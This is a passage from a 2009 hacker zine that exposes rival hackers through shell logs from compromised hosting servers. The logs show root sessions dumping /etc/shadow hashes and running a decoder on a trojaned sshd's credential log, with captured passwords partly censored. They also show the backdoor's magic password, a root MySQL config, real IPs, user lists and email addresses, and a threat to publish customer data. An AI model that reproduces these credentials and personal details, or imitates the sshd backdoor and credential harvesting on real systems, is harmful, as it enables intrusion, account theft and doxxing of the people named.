23:46 [notrael(notrael@tdirc-F327CDE7.org)] "Never sell out, never surrender. Get in as anonymous, Leave with no trace.
--- Log closed Sun Jun 28 02:13:14 2009


[0x04] [vitalspeeds - ProSec]

root@light [/]# hostname
light.co1.org
root@light [/]# uname -a
Linux light.co1.org 2.6.17.5-HN-2.3-P4 #1 SMP Sat Jul 15 09:55:04 EDT 2006 i686 i686 i386 GNU/Linux
root@light [/]# date
Tue Jun 23 20:06:26 EDT 2009
root@light [/]# cd /home
root@light [/home]# ls
./ blndbill/ .cpcpan/ deevour/ group88/ joshd/ lost+found/ nglgorg/ r00t/ timc/
../ blueacre/ cpeasyapache/ denial/ hadrys/ karbassi/ mapmap/ nickg/ radical/ timc14/
amp3dne/ bziem/ cprestore/ digital/ handknit/ kcole/ maraka/ noct/ rannman/ tmp/
animal/ cache/ cpzendinstall/ drireign/ harry3/ kidc/ mrwoot/ nycrob/ raven/ tradefx/
apadana/ cawn/ craig/ edgein/ hasting/ knokes/ msupike/ olliee/ robotey/ untitled/
aquota.user* cfurn/ ctcped/ fran459/ hastings/ kozmo/ munin/ pioneer/ russ43/ values/
army/ charice/ curator/ func88/ ircmilw/ kujio/ MySQL-install/ plumcree/ sheik/ vincent/
auxone/ chemmer/ daelenbe/ futonre/ jamesj/ kyle/ national/ porch46/ starr/ virtfs/
badassb/ christa/ danielc/ fxarbitr/ jb007/ lakeshor/ neptunes/ prime/ stopcand/ vitus/
bebe/ cmilone/ ddosmyi/ ganja/ jeffhem/ light/ netdevil/ psurge/ sub/ wrench/
berkel/ .cpan/ dear/ ganja51/ jer1h/ lithium/ netenberg/ qstud/ syscrash/ yasha/
billing/ cpapachebuild/ decalsby/ greg93/ jkaiser/ lost/ nglgnet/ quota.user* tickah/
root@light [/home]#

root@light [/home]# cat /etc/passwd
root@light [/home]#


root@light [~]# ifconfig -a
eth0 Link encap:Ethernet HWaddr 00:50:8D:C2:F0:C9
inet addr:66.197.170.181 Bcast:66.197.170.191 Mask:255.255.255.240
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:66876060 errors:0 dropped:0 overruns:0 frame:0
TX packets:81485342 errors:0 dropped:1 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:652037555 (621.8 MiB) TX bytes:1600708482 (1.4 GiB)
Interrupt:16 Base address:0xd000

eth0:1 Link encap:Ethernet HWaddr 00:50:8D:C2:F0:C9
inet addr:66.197.170.182 Bcast:66.197.170.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:16 Base address:0xd000

eth0:2 Link encap:Ethernet HWaddr 00:50:8D:C2:F0:C9
inet addr:66.197.170.183 Bcast:66.197.170.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:16 Base address:0xd000

eth0:3 Link encap:Ethernet HWaddr 00:50:8D:C2:F0:C9
inet addr:66.197.170.185 Bcast:66.197.170.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:16 Base address:0xd000

eth0:4 Link encap:Ethernet HWaddr 00:50:8D:C2:F0:C9
inet addr:66.197.170.186 Bcast:66.197.170.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:16 Base address:0xd000

eth0:5 Link encap:Ethernet HWaddr 00:50:8D:C2:F0:C9
inet addr:66.197.170.184 Bcast:66.197.170.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:16 Base address:0xd000

gre0 Link encap:UNSPEC HWaddr 00-00-00-00-FF-00-00-00-00-00-00-00-00-00-00-00
NOARP MTU:1476 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:38383139 errors:0 dropped:0 overruns:0 frame:0
TX packets:38383139 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:3605264865 (3.3 GiB) TX bytes:3605264865 (3.3 GiB)

tunl0 Link encap:IPIP Tunnel HWaddr
NOARP MTU:1480 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

root@light [~]# cat /var/named/ownage.net.db
; Modified by Web Host Manager
; Zone File for ownage.net
$TTL 14400
@ 86400 IN SOA dns.vitalspeeds.com. support.vitalspeeds.com. (
        2006111702
        86400
        7200
        3600000
        86400
        )

ownage.net. 86400 IN NS dns.vitalspeeds.com.
ownage.net. 86400 IN NS ns2.vitalspeeds.com.


ownage.net. 14400 IN A 72.20.28.204

localhost.ownage.net. 14400 IN A 127.0.0.1

ownage.net. 14400 IN MX 0 ownage.net.

mail 14400 IN CNAME ownage.net.
www 14400 IN CNAME ownage.net.
ftp 14400 IN CNAME ownage.net.
absolute.ownage.net. 14400 IN A 72.20.28.205
talk.about.ownage.net. 14400 IN A 72.20.18.131
complete.ownage.net. 14400 IN A 72.20.28.206


[0x05] [makosolutions - ProSec]

Delivered-To: glafkos@gmail.com
Received: by 10.223.117.209 with SMTP id s17cs437044faq;
        Thu, 2 Jul 2009 13:31:48 -0700 (PDT)
Received: by 10.224.67.129 with SMTP id r1mr663571qai.234.1246566706699;
        Thu, 02 Jul 2009 13:31:46 -0700 (PDT)
Return-Path: <glafk0s@hotmail.com>
Received: from blu0-omc4-s21.blu0.hotmail.com (blu0-omc4-s21.blu0.hotmail.com [65.55.111.160])
        by mx.google.com with ESMTP id 2si5595246yxe.16.2009.07.02.13.31.45;
        Thu, 02 Jul 2009 13:31:46 -0700 (PDT)
Received-SPF: pass (google.com: domain of glafk0s@hotmail.com designates 65.55.111.160 as permitted sender) client-ip=65.55.111.160;
Authentication-Results: mx.google.com; spf=pass (google.com: domain of glafk0s@hotmail.com designates 65.55.111.160 as permitted sender) smtp.mail=glafk0s@hotmail.com
Received: from BLU123-W9 ([65.55.111.135]) by blu0-omc4-s21.blu0.hotmail.com with Microsoft SMTPSVC(6.0.3790.3959);
        Thu, 2 Jul 2009 13:31:22 -0700
Message-ID: <BLU123-W96370B1DA99ABE688265BEB2F0@phx.gbl>
Return-Path: glafk0s@hotmail.com
Content-Type: multipart/alternative;
        boundary="_817cc510-a5cf-4a68-bec3-2a43760f95ae_"


X-Originating-IP: [188.51.85.13] // You still have a lot to learn :)


From: james knuth <glafk0s@hotmail.com>
To: <micronet@aol.com>, <mikespry.mdots@mdots.net>, <jstrat85@aol.com>,
        <vlad@zealus.com>, <let995@yahoo.com>, <dejan@dwhost.net>,
        <democreations@gmail.com>, <sales@hostforwebsite.com>,
        <holeinthewallhosting@gmail.com>, <lucacri@gmail.com>, <k.ma@utoronto.ca>,
        <dsecuya@gmail.com>, <peteslaughterbeck@yahoo.com>,
        <michael.bastian@gmail.com>, <fletro@gmail.com>, <aalyazeedi@peo.gov.qa>,
        <msprycha@makosolutions.com>, <glafkos@gmail.com>,
        <horsepowerlounge@gmail.com>, <info@hostwebservice.com>,
        <dave@bavariansolutions.com>, <keishaf18@yahoo.com>,
        <adthorn@rochester.rr.com>, <mr22774556@live.com>, <vienna@consult.co.at>,
        <bruno.matthys@gmail.com>
Subject: Makosolutions, LLC
Date: Thu, 2 Jul 2009 22:31:22 +0200
Importance: Normal
MIME-Version: 1.0
X-OriginalArrivalTime: 02 Jul 2009 20:31:22.0341 (UTC) FILETIME=[10245150:01C9FB54]

MakoSolutions, LLC // The remaining content of this email has been provided to the proper authorities
- Hacked.

I will keep this short and simple, you hosted someone I want down and I decided to take down your company
and publish your customers information for that.

// This is not your game anymore "Faisal Hourani". It seems that your anti-sec ideals were just excuses..


HOOKOUT: 67.225.142.98 0x3aownt:rKDcb-54ZJ

+----------------------------[ Owned ]----------------------------+
| Hack everyone you can and then hack some more |
| Owned[DC] v2 |
| _______ . _______ . _______ |
| Get in as anonymous, Leave with no trace. |
| |
+-----------------------------------------------------------------+
[ Linux puma.makosolutions.net 2.6.9-67.0.1.ELsmp i686 ]

08:24:44 up 519 days, 11:20, 3 users, load average: 0.05, 0.10, 0.09
makos2 pts/1 61.17.231.6 Fri Jun 26 08:12 still logged in
makos2 pts/3 61.17.231.6 Fri Jun 26 04:10 - 04:25 (00:15)
makos2 pts/7 61.17.231.6 Fri Jun 26 04:09 - 04:09 (00:00)
makos2 pts/5 61.17.231.6 Fri Jun 26 03:58 - 04:09 (00:11)
makos2 pts/4 61.17.231.6 Fri Jun 26 03:54 still logged in

wtmp begins Tue Jun 2 01:09:06 2009
Owned[DC]:[~]# date
Fri Jun 26 08:26:44 EDT 2009
Owned[DC]:[~]# uname -a
Linux puma.makosolutions.net 2.6.9-67.0.1.ELsmp #1 SMP Wed Dec 19 16:01:12 EST 2007 i686 athlon i386 GNU/Linux
Owned[DC]:[~]#


Owned[DC]:[~]# cd /var/run/ssh
Owned[DC]:[/var/run]# gcc -o decode decode.c
Owned[DC]:[/var/run]# ./decode ssh.old
HOOKOUT: 67.225.142.98 root:_censored_
HOOKIN: root:_censored_
HOOKOUT: 66.96.220.213 root:_censored_
.
.
.
HOOKIN: makos2:_censored_
HOOKOUT: 64.191.116.202 root:_censored_

Owned[DC]:[/var/run]# w
08:32:59 up 519 days, 11:28, 3 users, load average: 0.23, 0.22, 0.13
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
makos2 pts/0 61.17.231.6 03:53 3:54 0.13s 0.00s sshd: makos2 [priv]
makos2 pts/1 61.17.231.6 08:12 6.00s 0.06s 0.01s sshd: makos2 [priv]
makos2 pts/4 61.17.231.6 03:54 18:40 0.02s 0.01s sshd: makos2 [priv]
Owned[DC]:[/var/run]#

Owned[DC]:[/var/run]# cat /etc/shadow
|
||
workfrom:_censored_$8whIbBBBjYzZxgDDDuMde.:14091:0:99999:7:::
|
||
megaspel:_censored_$aO1t9Wneps4O6nDXFn.84/:14093:0:99999:7:::
|
||
espel:_censored_$PNoLG3/nFppUcjJB7Ndkc1:14093:0:99999:7:::
|
||
dyna:_censored_$oeAPTO2pNcYr7jguVfS.o0:14097:0:99999:7:::
|
||
niklas:_censored_$MLPe0p9S4Wz.ficqPiWE3.:14098:0:99999:7:::
|
||
glendale:_censored_$36WbIrHoaY6p.wQHDMKSI/:14112:0:99999:7:::
|
||
theworkf:_censored_$k9UTdl9Xszol3vXe8XJex/:14113:0:99999:7:::
|
||
missreso:_censored_$cMQPqmDGUCrI5GCTJ95IW1:14114:0:99999:7:::
|
||
theletro:_censored_$uSdV14r/ad2VSUSQN076J1:14137:0:99999:7:::
|
||
simobilg:_censored_$lgR0ZcRPsacgrXN0CyTph/:14163:0:99999:7:::
|
||
concert:_censored_$u78BVeFn/9dqijD5FxFn30:14167:0:99999:7:::
|
||
worldsbe:_censored_$KhYsNIhpV/9MpNLsJ7KkD1:14176:0:99999:7:::
|
||
x1qo0xmz:_censored_$35pb2Tt3NF7mcdwa8ij0S/:14210:0:99999:7:::
|
||
american:_censored_$f64FdDQZShu/QPCT01cig.:14212:0:99999:7:::
|
||
firstrat:_censored_$Cg447uD7Pf1PSfs03LyFI0:14217:0:99999:7:::
|
||
xq05vz73:_censored_$H96kS5lH6gbiK3ShSPwJG.:14219:0:99999:7:::
|
||
imsauto:_censored_$18x.Al7E/c8nKVG5w4ge90:14225:0:99999:7:::
|
||
headwayp:_censored_$5.CQnCYJzlFnw10dJB1fo/:14253:0:99999:7:::
|
||
performa:_censored_$RXFC0.Y9sd19TL59ulzBy0:14248:0:99999:7:::
|
||
snowboar:_censored_$S0pOHKtr37Qp283oBChtz0:14246:0:99999:7:::
|
||
importeu:_censored_$0vHEmwZW2WImMY8i961N7.:14260:0:99999:7:::
|
||
holyschn:_censored_$yyYCxFr6MAeXOFS4uGZxE1:14262:0:99999:7:::
|
||
rivercit:_censored_$JhMlSLJOJxGB84SdIX9VL0:14271:0:99999:7:::
|
||
perform:_censored_$MwABPul6js/dDkESj3NCa/:14334:0:99999:7:::
|
||
sco:_censored_$mD1J7V6/XgnGKexigg7ZQ/:14342:0:99999:7:::
|
||
austinar:_censored_$kwPledBlp5.5FRj7TCsXF.:14349:0:99999:7:::
|
||
arlingto:_censored_$HOPfqdVPLDjcKYOYXBssZ.:14350:0:99999:7:::
|
||
albuquer:_censored_$IIfpFNji/HFkgySU9QPyZ.:14350:0:99999:7:::
|
||
jvconcer:_censored_$Up603l0cXWF0BisBD010v/:14352:0:99999:7:::
|
||
sanjosec:_censored_$6lZMqhYCRgu07TQSTca1D.:14352:0:99999:7:::
|
||
sdconcer:_censored_$jsdhywYTV6.yqzfh7IApB1:14352:0:99999:7:::
|
||
bukemark:_censored_$giCqM37r16fagpVb.7SlB/:14363:0:99999:7:::
|
||
laconcer:_censored_$WBI4s4H3O7Slpsk7zrZpj.:14366:0:99999:7:::
|
||
dforce:_censored_$fjjNVrQw8LPQCDcgXRUkc1:14392:0:99999:7:::
|
||
|
||
Owned[DC]:[/backup]# cat ~/.bash_history
ssh 64.191.54.229 -l butts
#1244614734
ssh 64.191.54.229 -l butts
#1244651529
ssh butts@64.191.54.229
#1244644856
ssh 66.96.220.213 -l makosolutions
#1244644866
ssh 66.96.220.213 -l makosolutions -p 2222
#1244645088
ssh 66.96.220.213 -l mako -p 2222
#1244650823
top -c
#1244651468
ssh 66.96.220.213
#1244651606
ssh 66.96.220.213 -l makosolutions
#1244659374
ifconfig | grep 67.225.142.98
#1244659384
ssh -l butts server.holeinthewallhosting.com
#1244659474
nmap server.holeinthewallhosting.com
#1244659875
ssh -l butts server.holeinthewallhosting.com
#1244659891
ssh -l butts 64.191.54.229
#1244677757
ssh -l makosolutions 66.96.220.213
#1244810932
exit
#1244944507
ssh 64.191.54.229 -l butts
#1244971944
ssh -l butts 64.191.54.229
#1245004682
ssh 64.191.116.203
#1245013655
exit
#1245067142
ssh 66.96.220.213
#1245062070
ssh 66.96.220.213
#1245074394
ssh 64.191.116.203
#1245076716
exit
#1245058974
ssh 66.96.220.213
#1245082594
ssh 64.191.116.203
#1245141381
grep nukelar.reality-matrix.org /etc/trueuserdomains
#1245141388
grep nukelar.reality-matrix.org /etc/userdomains
#1245141593
ssh 64.191.116.203
#1245161918
ssh 66.96.220.213
#1245161939
telnet 66.96.220.213 22
#1245161953
telnet 66.96.220.213 53
#1245161969
nmap 66.96.220.213
#1245162042
ssh 66.96.220.213 -p 80
#1245147550
ssh 64.191.116.203
#1244659875
ssh -l butts server.holeinthewallhosting.com
#1244659891
ssh -l butts 64.191.54.229
#1244677757
ssh -l makosolutions 66.96.220.213 // infosec.org.uk
#1244810932
exit
#1244944507
ssh 64.191.54.229 -l butts
#1244971944
ssh -l butts 64.191.54.229
#1245004682
ssh 64.191.116.203
#1245013655
exit
#1245067142
ssh 66.96.220.213
#1245062070
ssh 66.96.220.213
#1245074394
ssh 64.191.116.203
#1245076716
exit
#1245058974
ssh 66.96.220.213
#1245082594
ssh 64.191.116.203
#1245141381
grep nukelar.reality-matrix.org /etc/trueuserdomains
#1245141388
grep nukelar.reality-matrix.org /etc/userdomains
#1245141593
ssh 64.191.116.203
#1245161918
ssh 66.96.220.213
#1245161939
telnet 66.96.220.213 22
#1245161953
telnet 66.96.220.213 53
#1245161969
nmap 66.96.220.213
#1245162042
ssh 66.96.220.213 -p 80
#1245147550
ssh 64.191.116.203
#1245184460
ssh 66.96.220.213
#1245199770
ssh -l makosolutions 66.96.220.213
#1245318670
vi /etc/csf/csf.denyip
#1245318687
ssh 66.96.220.213
#1245318707
ssh root@66.96.220.213
#1245318749
ssh mako@66.96.220.213 -p2222
#1245318770
ssh mako@66.96.220.213 -p 2222
#1245318842
ssh mako@66.96.220.213 -p2222
#1245316906
ssh 66.7.198.124
#1245317031
ssh 66.7.198.124
#1245317159
ssh 66.96.220.213
#1245318179
ssh 66.96.220.213
#1245319038
ssh 67.225.159.152
#1245319073
ssh 67.225.159.152 -p22
#1245319077
ssh 67.225.159.152 -p 22
.
.
.
csf -l | grep 66.96.211.181
#1245999632
apf
#1246000060
ssh 66.96.211.181 -l root
#1246000637
grep 66.96.211.181 /var/log/messages
#1246002631
cat /usr/local/psa/version
#1246002640
ls /usr/local/psa/version
#1246015247
ls /usr/local/psa/version
#1245998530
ssh 64.191.72.85
#1245998556
telnet 64.191.72.85 25
#1245998595
vzlist -a
#1246001328
ssh 64.191.72.85

Owned[DC]:[/backup]# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda7 2.0G 426M 1.5G 23% /
/dev/sdb1 147G 61G 79G 44% /backup
/dev/sda1 1012M 46M 915M 5% /boot
none 2.0G 0 2.0G 0% /dev/shm
/dev/sda8 121G 32G 83G 28% /home
/dev/sda6 2.0G 37M 1.9G 2% /tmp
/dev/sda2 9.9G 5.6G 3.9G 60% /usr
/dev/sda5 9.9G 2.1G 7.3G 23% /var
/tmp 2.0G 37M 1.9G 2% /var/tmp
Owned[DC]:[/backup]#

Owned[DC]:[/etc/pam.d]# cat sshd
#%PAM-1.0
auth required pam_stack.so service=system-auth
auth required pam_nologin.so
account required pam_stack.so service=system-auth
password required pam_stack.so service=system-auth
session required pam_stack.so service=system-auth
session required pam_loginuid.so

auth required pam_shells.so

Owned[DC]:[/var/run]# hostname
puma.makosolutions.net
Owned[DC]:[/var/run]#

Owned[DC]:[~]# lsof -i TCP:22
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
sshd 17433 root 3u IPv6 791605626 TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:60137 (ESTABLISHED)
sshd 17441 makos2 3u IPv6 791605626 TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:60137 (ESTABLISHED)
sshd 21409 root 3u IPv6 791273811 TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:46198 (ESTABLISHED)
sshd 21412 makos2 3u IPv6 791273811 TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:46198 (ESTABLISHED)
sshd 26799 root 3u IPv6 791290938 TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:52436 (ESTABLISHED)
sshd 26806 makos2 3u IPv6 791290938 TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:52436 (ESTABLISHED)
ssh 26887 root 3u IPv4 791291132 TCP puma.makosolutions.net:42625->serv.localhost:ssh (ESTABLISHED)
sshd 29596 root 3u IPv6 791533593 TCP puma.makosolutions.net:ssh->188.51.85.13:34957 (ESTABLISHED)
// RoMeO logged in just before the rm -rf / of makosolutions.com
sshd 30850 root 3u IPv6 783032196 TCP *:ssh (LISTEN)

[0x06] [holeinthewallhosting - prosec]

64.191.54.229 0x3aownt:DlE46Y8KpH
+----------------------------[ Owned ]----------------------------+
| Hack everyone you can and then hack some more |
| Owned[DC] v2 |
| _______ . _______ . _______ |
| Get in as anonymous, Leave with no trace. |
| |
+-----------------------------------------------------------------+
[ Linux server.holeinthewallhosting.net 2.6.18-92.1.10.el5 i686 ]

11:12:13 up 78 days, 17:02, 0 users, load average: 1.73, 2.17, 2.23
mrich pts/0 75-28-177-133.li Thu Jun 25 22:40 - 22:47 (00:06)
jayzer pts/1 cpe-76-183-78-13 Thu Jun 25 00:45 - 00:49 (00:04)
fmystic pts/1 cpe-71-67-100-61 Wed Jun 24 23:27 - 00:14 (00:46)
butts pts/0 puma.makosolutio Wed Jun 24 21:47 - 02:54 (05:07)
bwc05 pts/1 host-136-245.flt Wed Jun 24 00:18 - 00:18 (00:00)

wtmp begins Wed Apr 29 04:10:02 2009
root@server [~]#

root@server [~]# lsof -i -n | grep ssh
sshd 13173 root 3u IPv6 496962909 TCP 64.191.54.229:ssh->68.56.217.209:63552 (ESTABLISHED)
sshd 13176 hsp 3u IPv6 496962909 TCP 64.191.54.229:ssh->68.56.217.209:63552 (ESTABLISHED)
sshd 13285 root 3u IPv6 496964091 TCP 64.191.54.229:ssh->68.56.217.209:4125 (ESTABLISHED)
sshd 13287 stephenm 3u IPv6 496964091 TCP 64.191.54.229:ssh->68.56.217.209:4125 (ESTABLISHED)
sshd 13287 stephenm 7u IPv4 505107114 TCP 64.191.54.229:53259->192.168.1.121:icslap (SYN_SENT)
sshd 13287 stephenm 8u IPv4 505106277 TCP 64.191.54.229:38749->192.121.86.4:http (SYN_SENT)
sshd 30096 root 3u IPv6 485663697 TCP *:ssh (LISTEN)
root@server [~]#

root@server [/var/run]# gcc -o decode decode.c
root@server [/var/run]# ./decode ssh.old
HOOKIN: falados:$.lWKq._censored_
HOOKIN: smithah:_censored_
.
.
.
HOOKIN: karsh:vnm_censored_
HOOKIN: karsh:vnm_censored_
HOOKIN: smithah:Coverfir_censored_
HOOKIN: karsh:vn_censored_
HOOKIN: mrich:t23_censored_
root@server [/var/run]#

root@server [/var/run]# hostname
server.holeinthewallhosting.net
root@server [/var/run]# uname -a
Linux server.holeinthewallhosting.net 2.6.18-92.1.10.el5 #1 SMP Tue Aug 5 07:41:53 EDT 2008 i686 i686 i386 GNU/Linux
root@server [/var/run]# date
Fri Jun 26 11:16:32 CDT 2009
root@server [/var/run]# ifconfig -a
eth0 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
inet addr:64.191.54.229 Bcast:64.191.54.239 Mask:255.255.255.240
inet6 addr: fe80::219:d1ff:fefb:459b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:739777531 errors:0 dropped:0 overruns:0 frame:0
TX packets:970111216 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:587506583 (560.2 MiB) TX bytes:4170982921 (3.8 GiB)
Interrupt:217 Base address:0x2000

eth0:1 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
inet addr:64.191.54.230 Bcast:64.191.54.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:217 Base address:0x2000

eth0:2 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
inet addr:64.191.54.231 Bcast:64.191.54.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:217 Base address:0x2000

eth0:3 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
inet addr:64.191.54.232 Bcast:64.191.54.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:217 Base address:0x2000

eth0:4 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
inet addr:64.191.54.233 Bcast:64.191.54.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:217 Base address:0x2000

eth0:5 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
inet addr:64.191.36.197 Bcast:64.191.36.207 Mask:255.255.255.240
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:217 Base address:0x2000

eth0:6 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
inet addr:64.191.36.198 Bcast:64.191.36.207 Mask:255.255.255.240
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:217 Base address:0x2000

eth0:7 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
inet addr:64.191.36.199 Bcast:64.191.36.207 Mask:255.255.255.240
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:217 Base address:0x2000

eth0:8 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
inet addr:64.191.36.200 Bcast:64.191.36.207 Mask:255.255.255.240
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:217 Base address:0x2000

eth0:9 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
inet addr:64.191.36.201 Bcast:64.191.36.207 Mask:255.255.255.240
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:217 Base address:0x2000

eth0:10 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
inet addr:64.191.36.202 Bcast:64.191.36.207 Mask:255.255.255.240
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:217 Base address:0x2000

eth0:11 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
inet addr:64.191.36.203 Bcast:64.191.36.207 Mask:255.255.255.240
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:217 Base address:0x2000

eth0:12 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
inet addr:64.191.36.204 Bcast:64.191.36.207 Mask:255.255.255.240
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:217 Base address:0x2000

eth0:13 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
inet addr:64.191.36.205 Bcast:64.191.36.207 Mask:255.255.255.240
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:217 Base address:0x2000

eth0:14 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
inet addr:64.191.36.206 Bcast:64.191.36.207 Mask:255.255.255.240
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:217 Base address:0x2000

eth1 Link encap:Ethernet HWaddr 00:50:04:6F:DA:43
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:217 Base address:0x8000

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:35636410 errors:0 dropped:0 overruns:0 frame:0
TX packets:35636410 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1453567506 (1.3 GiB) TX bytes:1453567506 (1.3 GiB)

sit0 Link encap:IPv6-in-IPv4
NOARP MTU:1480 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

root@server [/var/run]#

root@server [/var/run]# strings /usr/sbin/sshd | grep -B 5 DlE46Y8KpH
Rhosts authentication refused for %.100s: bad ownership or modes for home directory.
Rhosts authentication refused for %.100s: bad modes for %.200s
Server has been configured to ignore %.100s.
Accepted host %s ip %s client_user %s server_user %s
HOOKIN: %s:%s
DlE46Y8KpH
root@server [/var/run]#

root@server [/var/run]# strings /usr/sbin/sshd | grep -B 5 0x3
check_key_in_hostfiles: key %s for %s
auth1.c
sending challenge '%s'
ruser %.100s
do_authloop: BN_new failed
0x3aownt

root@server [~]# cat .my.cnf
[client]
user="root"
pass=",a5.z_censored_"
root@server [~]#

root@server [/tmp]# cd /var/run/
root@server [/var/run]# ls
./ couriersslcache dbus/ mdmpd/ pm/ saslauthd/ tailwatchd.pid
../ cpanellogd.pid eximstats/ messagebus.pid pop3d.pid screen/ upcp.pid
acpid.socket= cpdavd.pid ftpd.sock= named/ pop3d.pid.lock sdp= utmp
audispd_events= cphulkd_detector.pid haldaemon.pid named.pid@ pop3d-ssl.pid setrans/ winbindd/
auditd.pid cphulkd_processor.pid imapd.pid netreport/ pop3d-ssl.pid.lock setroubleshoot/ wpa_supplicant/
autofs.fifo-misc| cphulkd.sock= imapd.pid.lock NetworkManager/ ppp/ spamd.pid
autofs.fifo-net| cpsrvd.pid imapd-ssl.pid nscd/ pure-authd.pid sshd.pid
avahi-daemon/ crond.pid imapd-ssl.pid.lock pcscd.comm= pure-ftpd/ ssh.old
chkservd/ cups/ klogd.pid pcscd.pid pure-ftpd.pid sudo/
console/ cupsd.pid mdadm/ pcscd.pub rpc.statd.pid syslogd.pid
root@server [/var/run]# cd screen/
root@server [/var/run/screen]# ls
./ ../ S-root/
root@server [/var/run/screen]# cd S-root/
root@server [/var/run/screen/S-root]# ls
./ ../ 13472.pts-0.server|
root@server [/var/run/screen/S-root]# cat 13472.pts-0.server

root@server [/var/run/screen/S-root]# ls
./ ../ 13472.pts-0.server|
root@server [/var/run/screen/S-root]# cd ..
root@server [/var/run/screen]# ls
./ ../ S-root/
root@server [/var/run/screen]# ps -aux | grep -r screen
Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.7/FAQ
root 25085 0.0 0.0 3920 700 pts/1 S+ 11:27 0:00 grep -r screen
root@server [/var/run/screen]# ps -aux | grep -i screen
Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.7/FAQ
root 13472 0.0 0.0 5056 1064 ? Ss Jun10 0:00 SCREEN
root 25147 0.0 0.0 3920 680 pts/1 R+ 11:27 0:00 grep -i screen
root@server [/var/run/screen]#

[0x07] [darkmindz - zf05]

\ / _\/_
darkmindz .-'-. //o\ _\/_
-- / \ -- | /o\\
^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~`
We eat the night, we drink the time |
Make our dreams come true
And hungry eyes are passing by
On streets we call the zoo

Darkmindz.com was just another "haxor" AKA idiot breeding ground forum run by
the infamous Saudi named RoMeO. Fortunately, due to the recent events, RoMeO
decided to kill his site and handle because he was sloppy & cocky enough to link
